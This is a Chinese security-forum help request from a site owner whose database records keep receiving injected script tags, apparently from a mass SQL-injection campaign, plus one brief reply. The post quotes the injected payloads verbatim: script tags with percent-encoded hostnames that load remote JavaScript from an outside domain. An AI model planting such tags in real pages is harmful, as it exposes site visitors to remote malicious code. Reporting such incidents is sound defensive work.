瑞星卡卡安全论坛技术交流区入侵防御(HIPS) SQL注入攻击现象全过程(求助)

1   1  /  1  页   跳转

SQL注入攻击现象全过程(求助)

SQL注入攻击现象全过程(求助)

具体表现为:
网站数据库的数据表的用户信息后面被写入"!<Script Src=http://c.nuc%6Cear3.com/css/c.js></Script><Script Src=http://c.%6E%75clear3.com/css/c.js></Script>"
删除了其代码又自动生成...

最新特征:

1、用户发布新信息内容后在5个小时左右,在数据表的相关字段写入“<Script Src=http://c.nuc%6Cear3.com/css/c.js></Script>“
2、删除代码后第一次在用户信息内容里被写入的是"</Script><Script Src=http://c.%6E%75clear3.com/css/c.js></Script>"过几个小时后写入两段就成“<Script Src=http://c.nuc%6Cear3.com/css/c.js></Script><Script Src=http://c.%6E%75clear3.com/css/c.js></Script>”再过几个小时后写入3段就成“.<Script Src=http://c.nuc%6Cear3.com/css/c.js></Script><Script Src=http://c.%6E%75clear3.com/css/c.js></Script><Script Src=http://c.nucl%65%61r3.com/css/c.js></Script>”


例子网站:

华派信息网(http://www.hp5e.com)

望专家尽快作出解决方案,以免更多网站受其害!

用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
分享到:
gototop
 

回复:SQL注入攻击现象全过程(求助)

瑞星防毒墙,对这次的攻击是防不住了!
gototop
 
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT